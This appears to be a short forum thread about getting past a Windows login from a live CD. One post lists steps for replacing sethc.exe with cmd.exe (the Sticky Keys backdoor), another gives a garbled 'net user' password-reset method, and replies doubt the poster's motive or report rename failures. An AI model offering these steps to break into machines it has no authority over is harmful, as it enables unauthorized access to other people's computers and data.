commands for mounting the NTFS in your live session
1) Mount your filesystem... (mkdir /mnt/winderz && mount -t captive-ntfs
/dev/hda1 /mnt/winderz)
2) Move %SYSTEMROOT%\system32\sethc.exe to
%SYSTEMROOT%\system32\sethc.exe.old
3) Copy %SYSTEMROOT%\system32\cmd.exe to %SYSTEMROOT%\system32\sethc.exe

cant rename sethc.exe ...it says "you need permission to perform this action"...

hmm let me see now, mayby you are not looking for something on the system but rather placing trojan backdoors or some shiz to steal info such as logins and such

i have a way for xp go to login press ctrl alt del login administrator no password in cmd type(net user}net user put username next then alt 8 put disered pass NOTE.THE PASS WILL NOT APPEAR JUST TYPE IT THEN HIT ENTER THEN REBOOT AND TYPE THE PASS YOU PUT

so you have physical access and a live cd. why even boot windows? you already have access to everything.

This doesn't seem to work with backtrack2. since I can't rename files on an NTFS volume for some reason.
